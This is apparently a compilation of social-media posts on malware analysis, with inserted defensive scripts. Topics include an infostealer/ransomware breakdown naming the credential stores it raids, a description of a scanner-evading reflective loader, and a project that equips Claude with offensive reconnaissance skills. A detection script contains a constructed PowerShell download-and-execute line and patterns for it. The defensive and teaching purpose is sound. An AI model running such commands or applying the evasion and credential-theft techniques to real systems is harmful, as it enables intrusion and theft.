My PC was infected by a #ransomware after I installed a cracked version of Adobe #Photoshop. The hacker told me to sit and cry, but what did I actually do? I reversed it.

I used to love using #PiratedSoftware because it offered premium features for free, but I also have zero tolerance for being hacked by someone as a result of using it. So, instead of paying the ransom while crying, I did the opposite. I stayed in the environment to see exactly how the malware was talking to the attacker’s server.

Here is what I got from low-level analysis:
1. The executable file (Setup.exe) is a malware loader which drops multiple stages of payloads: Infostealer > RAT > RCE via cmd > ransomware
2. The malware steals Discord authentication tokens from LevelDB, Telegram session files from tdata, and Steam session tokens from loginusers.vdf
3. It also steals saved passwords and cookies from 30+ Chromium browsers and all major Gecko-based browsers
4. Somehow the ransomware was not triggered in my 2nd run, so I'm stuck analyzing the ransomware part.

🖼️ The image below explains the malware's capabilities and my analysis result.
Image 2: Browser credential theft flow, including autofill entries, email logins, payment data, and cookie-related data
Image 3: Attacker's wallet address was decoded from hex to ASCII, resulting in the C2 IP address
Image 4: Exfiltration payload being recovered from memory before encryption, where it appears as a base64 blob beginning with ZIP magic bytes

"If it's free, you're the product." So, avoid installing pirated software if you don't want your data being sold online.

I have written my malware analysis result in the following link. Let me know your insight!
🔗 Link: https://lnkd.in/gfceCcMj

#MalwareAnalysis #MalwareDevelopment #ReverseEngineering #CyberSecurity #CrackedSoftware #AdobePhotoshop
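A defender-side script for the recovery step shown in Image 4, added here as an example and not part of the original post or its linked write-up: base64 of the ZIP local-file-header magic `PK\x03\x04` always starts with the text `UEsDB`, so a process dump can be searched for that prefix, decoded, and listed with the standard `zipfile` module without extracting anything to disk. The "dump" is a constructed byte string built inside the script and the archive member names are illustrative.

```python
import base64
import io
import re
import zipfile

# Base64 of the ZIP local-file-header magic "PK\x03\x04" always begins with "UEsDB",
# so a memory dump can be searched for that text prefix instead of for raw bytes.
B64_ZIP_RUN = re.compile(rb"UEsDB[A-Za-z0-9+/]{20,}={0,2}")


def find_base64_zips(blob: bytes):
    """Yield (offset, decoded_bytes) for each base64 run in blob that decodes to a ZIP."""
    for match in B64_ZIP_RUN.finditer(blob):
        run = match.group(0)
        run = run[: len(run) - len(run) % 4]  # drop a ragged tail so the length cannot break decoding
        try:
            data = base64.b64decode(run, validate=True)
        except ValueError:
            continue
        if data.startswith(b"PK\x03\x04"):
            yield match.start(), data


def list_members(zip_bytes: bytes):
    """Return (name, uncompressed_size) for each member of an in-memory ZIP, without extracting."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [(info.filename, info.file_size) for info in zf.infolist()]


def recover_from_dump(blob: bytes):
    """Locate base64-encoded ZIP archives in a dump and list their contents."""
    hits = []
    for offset, data in find_base64_zips(blob):
        try:
            members = list_members(data)
        except zipfile.BadZipFile:
            continue  # a valid local header but a truncated archive; nothing to list
        hits.append({"offset": offset, "size": len(data), "members": members})
    return hits


def build_constructed_dump() -> bytes:
    """Constructed sample: noise, an HTTP multipart fragment, a base64 ZIP, more noise."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("cookies.txt", "session=CONSTRUCTED\n")
        zf.writestr("tokens.json", '{"discord": "CONSTRUCTED-TOKEN"}')
    encoded = base64.b64encode(buf.getvalue())
    return b"\x00" * 64 + b"Content-Disposition: form-data\r\n\r\n" + encoded + b"\r\n" + b"\x00" * 64


if __name__ == "__main__":
    for hit in recover_from_dump(build_constructed_dump()):
        print(f"offset={hit['offset']} size={hit['size']} members={hit['members']}")
```

On a real dump, point `recover_from_dump` at the bytes of a process or VAD dump; listing members rather than extracting them keeps stolen credential files out of the analyst's own file system.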
Ethical Hacking Techniques
-
Analyzing the leaked code from the Vanhelsing Ransomware, it is essentially a highly modular and automated builder, developed in C++, designed to dynamically generate executable binaries (.exe) based on instructions received from a C2 server.

The core logic includes a persistent loop (wmain) that continuously polls for new tasks via REST HTTP requests to an attacker-controlled endpoint. When a task is received, the system automatically compiles two binaries: the locker, responsible for encrypting the victim's files, and the decrypter, which allows for data recovery if the correct key is provided.

The main payload is encrypted using AES-256-GCM (via libsodium), with a key derived from an X25519 key pair. The compiled locker binary is read, encrypted, converted into a binary header, and embedded into the loader, which is the final stage responsible for decrypting and executing the locker at runtime. The modular architecture allows the same locker to be reused with multiple loaders.

File operations are handled directly through low-level Win32 API calls (CreateFileA, ReadFile, MoveFileA, DeleteFileA), with no dependency on external libraries. PowerShell’s Compress-Archive is also used to efficiently package and transmit artifacts via HTTP.

There is a clear separation of responsibilities in the build pipeline: reading, encryption, macro substitution, architecture-specific compilation (Win32/x64), binary renaming, and upload to the C2 are all handled in well-defined stages, with error handling and diagnostics performed via GetLastError().

Summary of Evasion Techniques:
- Encryption of artifacts using X25519 + AES-256-GCM
- Use of fileless-like execution via loader with embedded payload
- Per-build uniqueness through dynamic key and ID insertion
- Compilation via MSBuild (LOLBin abuse)

#redteam #cybersecurity #malware #malwaredevelopment #malwareanalysis
-
Malware analysts, this one’s for you. If you’re currently investigating an MSI file, always make sure to dump binaries from the Binary table and inspect the binary overlays. By reviewing the CustomActions table, it usually becomes clear very quickly which files are of real interest and which are less relevant.

In a recent analysis of several EvilAI infections, we came across an MSI package that dropped a CAB file, fairly typical behavior for installer packages. However, this CAB archive contained a particularly suspicious C# executable, which, once disassembled, revealed the primary dropper functionality.

Interestingly, many public write-ups on MSI-based malware, including this specific campaign, mention difficulties in identifying the actual dropper source or issues handling MSI files in general. That’s often a sign of overlooking how installer packages are structured.

I highly recommend taking a deeper look at the MSI file format itself and familiarizing yourself with common installer frameworks such as WiX. We see similar analysis challenges with Inno Setup and comparable packagers. Always remember to examine the File sections, overlays, and magic bytes carefully; they often hold the key to uncovering what’s really going on.

#MalwareAnalysis #ThreatResearch #EvilAI #ReverseEngineering #CyberSecurity #DigitalForensics
-
Digital Forensics Tip: Hunting for Persistence! 🕵️♀️

After a system is compromised, an attacker's top priority is to ensure their malware survives a reboot. They achieve this by leveraging Autorun mechanisms, which are legitimate Windows functions designed to launch programs and services automatically. By analyzing these registry keys, we can uncover hidden threats.

🔍 Here are two key locations to investigate:

1. System Boot Persistence 🖥️
Malware, especially sophisticated threats like Rootkits and Botnets, loves to embed itself in locations that run with high privileges at system startup, even before a user logs in.
• Registry Path: `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services`
• What to Look For: Examine the `ImagePath` value within each service's subkey. This value points to the executable file for that service. Finding an unfamiliar or suspicious path (e.g., in temporary user folders) is a strong indicator of a malicious service used for persistence.

2. User-Level Persistence 👤
Another strategic spot for malware is the `ShellServiceObjectDelayLoad` key.
• Registry Path: `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad`
• Why It's Critical: Any COM objects registered here are loaded directly by the Explorer.exe process when the graphical user interface starts. This ensures the malicious code executes early and with user privileges, making it a stealthy persistence method.

Mastering these analysis techniques is essential for uncovering hidden malware and securing systems. Don't skip these crucial steps in your next investigation! ✅

#CyberSecurity #DFIR #MalwareAnalysis #WindowsForensics #Persistent #APT #DF
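An added Python triage pass for the two checks described above (example code, not the author's). It assumes the registry values have already been exported, for instance with a hive parser or `reg export`, and that each ShellServiceObjectDelayLoad entry has been resolved through its CLSID's `InprocServer32` value to the DLL it loads. The inventory in the script is constructed, and the three heuristics (binary under a user-writable or temporary directory, unquoted path containing spaces, binary outside Windows or Program Files) are a starting point for review, not a verdict.

```python
import re

# Directories a service binary should not normally live in: user-writable or temporary locations.
USER_WRITABLE = re.compile(
    r"\\(?:temp|tmp|appdata|users\\public|downloads|\$recycle\.bin|programdata)\\",
    re.IGNORECASE,
)
SYSTEM_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def extract_binary(image_path: str):
    """Return (normalised path of the binary, was_quoted) from a raw ImagePath value.

    Handles quoted paths with arguments, the \\??\\ and \\SystemRoot\\ kernel-style prefixes,
    %SystemRoot%, and the bare "system32\\drivers\\x.sys" form used by many driver services.
    """
    raw = image_path.strip()
    quoted = raw.startswith('"')
    if quoted:
        path = raw[1:].split('"', 1)[0]
    else:
        m = re.match(r"(.+?\.(?:exe|sys|dll))(?:\s|$)", raw, re.IGNORECASE)
        path = m.group(1) if m else raw.split(" ", 1)[0]
    path = path.replace("%SystemRoot%", "C:\\Windows")
    if path.startswith("\\??\\"):
        path = path[4:]
    if path.lower().startswith("\\systemroot\\"):
        path = "C:\\Windows" + path[len("\\systemroot"):]
    elif path.lower().startswith("system32\\"):
        path = "C:\\Windows\\" + path
    return path, quoted


def triage_image_path(image_path: str):
    """Reasons this ImagePath deserves a closer look; an empty list means nothing looked odd."""
    path, quoted = extract_binary(image_path)
    low = path.lower()
    reasons = []
    if USER_WRITABLE.search(low):
        reasons.append("binary lives under a user-writable or temporary directory")
    if not quoted and " " in path:
        reasons.append("unquoted path containing spaces (search-order hijack risk)")
    if not low.startswith(SYSTEM_ROOTS):
        reasons.append("binary outside Windows / Program Files")
    return reasons


def triage_autoruns(services: dict, ssodl: dict):
    """Apply the same path checks to service ImagePath values and to the DLLs behind
    ShellServiceObjectDelayLoad entries (each CLSID's InprocServer32 path, resolved beforehand)."""
    findings = []
    for name, image_path in services.items():
        reasons = triage_image_path(image_path)
        if reasons:
            findings.append(("Services", name, reasons))
    for name, dll_path in ssodl.items():
        reasons = triage_image_path(dll_path)
        if reasons:
            findings.append(("ShellServiceObjectDelayLoad", name, reasons))
    return findings


# Constructed inventory standing in for a registry export; names and paths are illustrative.
CONSTRUCTED_SERVICES = {
    "Schedule": r"%SystemRoot%\system32\svchost.exe -k netsvcs",
    "acpi": r"\SystemRoot\System32\drivers\acpi.sys",
    "VendorAgent": r"C:\Program Files\Vendor Tool\agent.exe --service",
    "WinUpdateSvc": r"C:\Users\bob\AppData\Local\Temp\svchost.exe",
}
CONSTRUCTED_SSODL = {
    "WebCheck": r"C:\Windows\System32\webcheck.dll",
    "ShellHelper": r"C:\ProgramData\Shell\helper.dll",
}

if __name__ == "__main__":
    for source, name, reasons in triage_autoruns(CONSTRUCTED_SERVICES, CONSTRUCTED_SSODL):
        print(f"[{source}] {name}: {'; '.join(reasons)}")
```

Anything the script flags still needs a comparison against a known-good baseline host, since a legitimate agent installed under ProgramData will trip the same rule as a malicious one.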
-
During recent memory forensics research I've been doing on evading memory scanners, I was researching how to bypass Volatility's Malfind plugin, and I developed a reflective PE loader for that.

Malfind searches for memory regions where the VAD (Virtual Address Descriptor) shows both WRITE and EXECUTE permissions, since legitimate applications rarely allocate PAGE_EXECUTE_READWRITE memory. This makes W+X a strong indicator of shellcode injection.

But since VADs store the initial allocation protection set by VirtualAlloc, when VirtualProtect changes page permissions, only the underlying page table entries (PTEs) permissions are modified, while the VAD's AllocationProtect field remains as originally set.

To demonstrate this, I wrote a reflective loader that:
1. Allocates memory with PAGE_READWRITE (VAD records: RW)
2. Writes the PE image, resolves imports, applies relocations
3. Calls VirtualProtect to set PAGE_EXECUTE_READ on the .text section

The VAD still shows PAGE_READWRITE (no execute), so Malfind doesn't flag it. The code executes normally because the CPU uses the actual page permissions from the PTEs, not the VAD.

This shows that in an investigation, relying on a single tool can lead to missed evidence and wrong conclusions. To detect this technique, dump private VAD regions (e.g., using Volatility's vadinfo plugin with --dump) and scan for PE headers (MZ/0x4D5A), which reveals injected code that Malfind misses. However, this approach requires filtering out legitimate PEs (e.g., Windows system DLLs), and this might take some time.

In a follow-up post, I'll share a detection method I developed that reliably identifies reflectively loaded PEs regardless of VAD permissions.

GitHub: https://lnkd.in/dUFiGp8z

#DFIR #IncidentResponse #MalwareAnalysis #CyberSecurity #MemoryForensics #Volatility
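The detection step at the end of this post (scan dumped VAD regions for PE headers while weeding out false positives) and the advice in the MSI post above (examine overlays and magic bytes) need the same PE header parser, so here is one added example covering both. It is not the author's code and not from any tool named on the page: `parse_pe` accepts an `MZ` only if `e_lfanew` lands on a `PE\0\0` signature inside the buffer, which discards the random two-byte matches a raw `MZ` scan produces; `scan_region` walks a dumped region (for example the files written by `vadinfo --dump`) and keeps only validated headers; `overlay` returns whatever follows the last section so its magic can be identified. The PE and the memory region are constructed in the script, and the `0x1000` bound on `e_lfanew` is a sanity limit, not a format rule. Filtering out legitimate system DLLs, as the post notes, still has to be done against a known-good module list.

```python
import struct

# Magic bytes of container formats commonly found in installer overlays and dumped regions.
MAGIC = {
    b"MZ": "PE/MZ executable",
    b"MSCF": "Microsoft CAB archive",
    b"PK\x03\x04": "ZIP archive",
    b"7z\xbc\xaf\x27\x1c": "7-Zip archive",
}


def identify_magic(data: bytes) -> str:
    for sig, name in MAGIC.items():
        if data.startswith(sig):
            return name
    return "unknown"


def parse_pe(blob: bytes, base: int = 0):
    """Validate a PE image starting at blob[base]; return header facts or None.

    A bare "MZ" is not enough: e_lfanew must point at a "PE\\0\\0" signature inside the
    buffer. Well-formed images place it after the 64-byte DOS header; 0x1000 is a sanity cap.
    """
    if blob[base:base + 2] != b"MZ" or base + 0x40 > len(blob):
        return None
    e_lfanew = struct.unpack_from("<I", blob, base + 0x3C)[0]
    pe = base + e_lfanew
    if e_lfanew < 0x40 or e_lfanew > 0x1000 or pe + 24 > len(blob):
        return None
    if blob[pe:pe + 4] != b"PE\x00\x00":
        return None
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", blob, pe + 4)
    table = pe + 24 + opt_size
    sections, end_of_sections = [], 0
    for i in range(nsections):
        off = table + i * 40
        if off + 40 > len(blob):
            return None
        name = blob[off:off + 8].rstrip(b"\x00").decode("ascii", "replace")
        # VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData
        _, _, raw_size, raw_ptr = struct.unpack_from("<IIII", blob, off + 8)
        sections.append((name, raw_ptr, raw_size))
        end_of_sections = max(end_of_sections, raw_ptr + raw_size)
    return {"machine": machine, "sections": sections, "overlay_offset": end_of_sections}


def scan_region(blob: bytes):
    """Offsets of every validated PE header in a dumped memory region."""
    hits, pos = [], blob.find(b"MZ")
    while pos != -1:
        if parse_pe(blob, pos) is not None:
            hits.append(pos)
        pos = blob.find(b"MZ", pos + 1)
    return hits


def overlay(file_bytes: bytes) -> bytes:
    """Bytes appended after the last section of a PE file (empty if there is no overlay)."""
    info = parse_pe(file_bytes)
    if info is None:
        return b""
    return file_bytes[info["overlay_offset"]:]


def build_constructed_pe(extra: bytes = b"") -> bytes:
    """Constructed minimal x64 PE: DOS stub, COFF header, one 16-byte .text section, then `extra`."""
    dos = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x40)
    coff = b"PE\x00\x00" + struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 0, 0x22)
    text = b".text\x00\x00\x00" + struct.pack("<IIII", 0x10, 0x1000, 0x10, 0x80) + b"\x00" * 16
    return dos + coff + text + b"\xcc" * 0x10 + extra


if __name__ == "__main__":
    sample = build_constructed_pe(b"MSCF" + b"\x00" * 32)  # a PE carrying a CAB-like overlay
    print("overlay:", identify_magic(overlay(sample)))
    region = b"\x00" * 16 + b"MZ_not_a_pe_" + b"\x00" * 40 + sample  # decoy MZ, then a real header
    print("PE headers at:", scan_region(region))
```

For an MSI, the same `overlay` call applied to each binary dumped from the Binary table shows whether a CAB or second executable is riding behind the visible PE; for a VAD dump, `scan_region` reduces the raw `MZ` hit list to headers that could actually be mapped.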
-
🚨 Claude is no longer just “chat with AI.” With the right skills, it can become an OSINT operator.

I came across Claude-OSINT, an open-source GitHub project that packages offensive reconnaissance methodology into Claude Skills.
🔗 GitHub Repo: https://lnkd.in/g-CTBvyT

And the idea is powerful: Instead of prompting Claude from scratch every time… you give it structured tradecraft.

What makes this interesting? The project includes:
✅ 2 paired Claude Skills
✅ 90+ recon modules
✅ 48 secret-regex patterns
✅ 80+ dorks
✅ 9 read-only credential validators
✅ 27 attack-path templates
✅ 5,500+ lines of structured OSINT methodology

The two-skill model is smart:
🔹 osint-methodology: How to think. Asset graphs, severity logic, time budgeting, scope discipline, reporting templates.
🔹 offensive-osint: What to reach for. Dorks, regexes, probe paths, validators, tool references, reconnaissance workflows.

💡 My biggest takeaway: The future of AI in security is not just better models. It is better operational context. A generic AI assistant gives generic answers. But an AI assistant with structured skills, scoped methodology, and clear constraints becomes much more useful for real security work.

🚨 Important point: This type of workflow should only be used for assets you own or have written authorization to assess. AI does not remove responsibility. It increases the need for scope, logging, and discipline.

Claude + OSINT skills can help with:
• external attack surface mapping
• subdomain discovery
• identity and SSO mapping
• cloud exposure checks
• secret pattern review
• breach intelligence
• reporting and prioritization

The real shift is simple:
❌ Prompting from memory
✅ Operating from methodology
That’s where AI becomes useful for security teams.

💬 Would you trust an AI-assisted OSINT workflow in your recon process?

#OSINT #ClaudeAI #AISecurity #CyberSecurity #RedTeam #BugBounty #ThreatIntelligence #Reconnaissance #InfoSec #AgenticAI
-
Fileless malware continues to challenge traditional security controls by operating in memory without leaving disk artifacts. Esra Kayhan's practical guide cuts through the complexity with actionable detection strategies:
• Monitor PowerShell execution patterns, focusing on encoded commands, Invoke-Expression and DownloadString usage
• Implement memory forensics with Volatility to identify in-memory PE headers and suspicious memory regions
• Deploy YARA rules specifically designed for behavioral indicators in process memory
• Leverage Sysmon for comprehensive telemetry including process creation, module loads, and network connections
• Shift from file-based to behavior-based detection using PowerShell logging, WMI monitoring, and LOLBin abuse patterns

The key takeaway? Effective fileless malware detection requires layering behavioral analysis, memory forensics and proper telemetry - not just signature matching.

🚀 Turn theory into practice. Learn actionable detection engineering and AI agents for security you can implement immediately. Secure your spot: https://buff.ly/oVDTAZf
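For the first bullet, here is added detection logic, not taken from the guide, run over constructed process-creation command lines of the kind Sysmon or 4688 events carry. It recognises every abbreviation PowerShell accepts for `-EncodedCommand` (from `-e` up to the full name), decodes the UTF-16LE payload, and then looks for Invoke-Expression/IEX, DownloadString and their usual companions in both the raw and the decoded text, which is what makes the check hold up when the interesting part is hidden inside the base64. The sample lines and the `example.invalid` URL are constructed.

```python
import base64
import re

# Every abbreviation PowerShell accepts for -EncodedCommand, longest first so "-enc" is not cut to "-e".
_ENC_FLAG = "|".join("encodedcommand"[:i] for i in range(14, 0, -1))
ENCODED_ARG = re.compile(rf"(?:^|\s)[-/](?:{_ENC_FLAG})\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Behavioural indicators from the post (encoded commands, Invoke-Expression, DownloadString)
# plus the companions that usually travel with them in fileless loaders: (label, regex).
INDICATORS = [
    ("Invoke-Expression", re.compile(r"invoke-expression|(?<![\w-])iex(?![\w-])", re.IGNORECASE)),
    ("DownloadString", re.compile(r"\.downloadstring\(", re.IGNORECASE)),
    ("Net.WebClient", re.compile(r"new-object\s+(?:system\.)?net\.webclient", re.IGNORECASE)),
    ("FromBase64String", re.compile(r"frombase64string", re.IGNORECASE)),
    ("hidden window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)),
    ("no profile", re.compile(r"-nop(?:rofile)?(?![\w-])", re.IGNORECASE)),
]


def decode_encoded_command(b64: str):
    """-EncodedCommand carries UTF-16LE text in base64; return it, or None if it does not decode."""
    padded = b64 + "=" * (-len(b64) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_command_line(cmdline: str) -> dict:
    """Expand any encoded command, then collect indicator labels from raw and decoded text."""
    decoded = None
    m = ENCODED_ARG.search(cmdline)
    if m:
        decoded = decode_encoded_command(m.group(1))
    haystack = cmdline + "\n" + (decoded or "")
    labels = ["EncodedCommand"] if m else []
    labels += [label for label, rx in INDICATORS if rx.search(haystack)]
    return {"encoded": bool(m), "decoded": decoded, "indicators": labels}


def triage_log(lines):
    """Return (line_number, result) for each log line that carries at least one indicator."""
    out = []
    for n, line in enumerate(lines, 1):
        result = analyze_command_line(line)
        if result["indicators"]:
            out.append((n, result))
    return out


def encode_for_sample(script: str) -> str:
    """Used only to build the constructed sample below, with the encoding PowerShell expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed log lines modelled on the CommandLine field of process-creation events.
CONSTRUCTED_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
CONSTRUCTED_LINES = [
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File C:\scripts\backup.ps1",
    "powershell.exe -nop -w hidden -enc " + encode_for_sample(CONSTRUCTED_SCRIPT),
    "powershell.exe -Command Get-Service -Name Spooler",
]

if __name__ == "__main__":
    for n, result in triage_log(CONSTRUCTED_LINES):
        print(n, result["indicators"], result["decoded"])
```

Script Block Logging (event 4104) records the decoded text on its own, but the command-line check above is what you have on hosts where that logging was never enabled, and it also catches the launcher flags (`-nop`, `-w hidden`) that the script block itself does not contain.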
-
If you’re analyzing malware, your virtual machine is your primary workspace. A well-configured lab lets you dig deeper, stay safe, and trust what you’re seeing. In my latest 🎥 video, I walk through how to build my ideal Windows 11 malware analysis lab. It's the same environment I use every day for real-world reverse engineering and teaching. I cover my virtualization setup, key configuration tweaks, and tools for static, dynamic, and code analysis. Drop a comment and let me know what you think! 👉 Watch the video here: https://lnkd.in/eRFzNdnp
My Windows 11 Malware Analysis Lab Setup
-
If you’re studying Political Science and not exploring OSINT, you might be missing out on the fastest-growing career path in risk & security. Here’s why 👇

Most PolSci students get trained to read theories, debates, and history. But OSINT (Open-Source Intelligence) teaches you how to apply that knowledge to the real world. Think about it:
🔎 Instead of just studying “conflict theory,” you’re live-tracking how protests, coups, or cyberattacks unfold.
🗺️ Instead of writing about borders, you’re mapping satellite images or shipping routes.
📡 Instead of abstract debates, you’re decoding signals from Telegram, TikTok, or local news wires.

💡 Why this matters: Companies, NGOs, and governments all rely on OSINT analysts to anticipate disruptions, from supply chain risks to political instability. And PolSci students are naturally good at it because you already know how to connect dots across politics, society, and security.

✨ Want to start? Try these free resources:
- OSINTCurious — beginner-friendly blogs & streams.
- Trace Labs OSINT Discord — hands-on practice.
- Bellingcat’s Guides — practical tutorials.

PolSci isn’t just about books & exams anymore. It’s about being the person who can say: “I saw this coming.”

✨ Over the years, so many Humanities, Political Science & IR grads have reached out to me — usually feeling lost about what comes after the degree. 💡 Each time, I’ve shared a few resources that gave them clarity and helped them take real steps forward. And almost every single person comes back saying: “I wish I had this earlier.”

👉 If you’re figuring out your own path and don’t want to waste months in trial-and-error, just DM me or drop your email — I’ll share them with you too.
-
Part 2: Dynamic Malware Analysis

Dynamic Malware Analysis is the process of running potentially malicious software in an isolated environment to monitor and analyze its actions and effects on the system.

Key Aspects to Monitor:
• File System Activity: Creation, modification, or deletion of files.
• Process Activity: New processes spawned, process injection, or unusual process behavior.
• Registry Changes: Modifications to registry keys and values.
• Network Traffic: Outgoing connections, data exfiltration, or communication with suspicious IP addresses or domains.
• Memory Activity: Unusual memory usage or memory injection techniques.
• Persistence Mechanisms: Attempts to achieve persistence through startup entries, scheduled tasks, or services.
• API Calls: Suspicious or uncommon API calls that might indicate malicious intent.
• System Changes: Changes to system settings, configurations, or security policies.
• Behavioral Anomalies: Any behavior that deviates from the norm, such as unexpected encryption or obfuscation.

Tools for Dynamic Malware Analysis:
Sandbox Environments: Cuckoo Sandbox, FireEye, Joe Sandbox, Hybrid Analysis, Any.Run, VxStream Sandbox
Process and System Monitoring: Process Monitor, Process Hacker, Autoruns, Noriben, Sysinternals Suite
Network Analysis: Fiddler, Wireshark, TCPView, ApateDNS
Static and Hybrid Analysis: VirusTotal, ReversingLabs TitaniumCloud, Intezer Analyze, Ghidra
Registry and System Change Detection: Regshot
Debugging and Code Analysis: OllyDbg, x64dbg, PE-sieve, Windbg, Radare2
Visual Analysis and Correlation: ProcDot
Specialized Linux Toolkit: REMnux
Other Tools: SysInternal Tools, CFF Explorer, PEView, BinText, PEiD, Regshot, HashMyFiles

Detailed Focus Areas:
Process Activities: Detect processes, focus on new child processes, DLL imports, and user context. Tools like Process Hacker help visualize these processes.
Network Activities: Analyze connections using Wireshark and Fiddler to understand and report the malware’s network activities.
Registry Activities: Monitor key registry locations:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
Tools like Regshot can compare registry states before and after malware execution to identify changes made by the malware.
File Activities: Monitor directories like "Temp" and "Startup" for suspicious activities.
'%TEMP%' for temporary files
'shell:startup' and 'shell:common startup' for startup directories

Step-by-Step Guide for Dynamic Malware Analysis:
1. Prepare the Analysis Environment
2. Install Analysis Tools
3. Configure Monitoring Tools
4. Execute the Malware Sample
5. Monitor and Record Behavior
6. Analyze Collected Data
7. Restore the Environment

BlackPerl DFIR
#CyberSecurity #MalwareAnalysis #CyberDefense #Hacking
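The Regshot-style before/after comparison of the four Run keys listed above, as an added example that is not part of the original post (steps 3, 5 and 6 of the guide for that one area): it parses the text `reg query` prints for those keys (key path flush-left, then one indented line per value with name, type and data separated by four-space gaps) and diffs the two snapshots, treating a key that is missing from one capture as empty so newly created keys are reported too. The before and after captures are constructed.

```python
# The four autorun keys named in the post; Regshot compares whole hives, this narrows to them.
RUN_KEYS = (
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce",
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce",
)


def parse_reg_query(text: str) -> dict:
    """Parse the text `reg query <key>` prints into {key: {value_name: (type, data)}}.

    reg.exe writes the key path flush-left and each value on an indented line with
    name, type and data separated by four-space gaps; a key with no values still appears.
    """
    snapshot, current = {}, None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line.startswith(" "):
            current = line.strip()
            snapshot.setdefault(current, {})
        elif current is not None:
            parts = line.strip().split("    ", 2)
            if len(parts) >= 2:
                name, vtype = parts[0], parts[1]
                data = parts[2] if len(parts) == 3 else ""
                snapshot[current][name] = (vtype, data)
    return snapshot


def diff_snapshots(before: dict, after: dict, keys=RUN_KEYS) -> list:
    """Report every value added, removed or modified under `keys` between two snapshots.

    A key absent from a snapshot counts as having no values, so a key the sample
    creates from scratch shows up as a series of "added" entries.
    """
    changes = []
    for key in keys:
        old, new = before.get(key, {}), after.get(key, {})
        for name in sorted(set(old) | set(new)):
            if name not in old:
                changes.append({"key": key, "value": name, "change": "added", "before": None, "after": new[name]})
            elif name not in new:
                changes.append({"key": key, "value": name, "change": "removed", "before": old[name], "after": None})
            elif old[name] != new[name]:
                changes.append({"key": key, "value": name, "change": "modified", "before": old[name], "after": new[name]})
    return changes


def diff_run_keys(before_text: str, after_text: str) -> list:
    """Convenience wrapper: raw reg query output before and after detonation in, changes out."""
    return diff_snapshots(parse_reg_query(before_text), parse_reg_query(after_text))


# Constructed captures standing in for `reg query` run before and after the sample executes.
CONSTRUCTED_BEFORE = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\bob\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
"""

CONSTRUCTED_AFTER = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\bob\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    WindowsUpdateCheck    REG_SZ    C:\Users\bob\AppData\Local\Temp\svchost.exe

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    C:\ProgramData\sh\SecurityHealthSystray.exe
"""

if __name__ == "__main__":
    for c in diff_run_keys(CONSTRUCTED_BEFORE, CONSTRUCTED_AFTER):
        print(f"{c['change']:<9} {c['key']}\\{c['value']}: {c['before']} -> {c['after']}")
```

Take the "before" capture only after the monitoring tools are configured and the snapshot is clean, otherwise their own autorun entries show up as changes; the same parser and diff work unchanged for the Services key or any other key you add to `RUN_KEYS`.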
-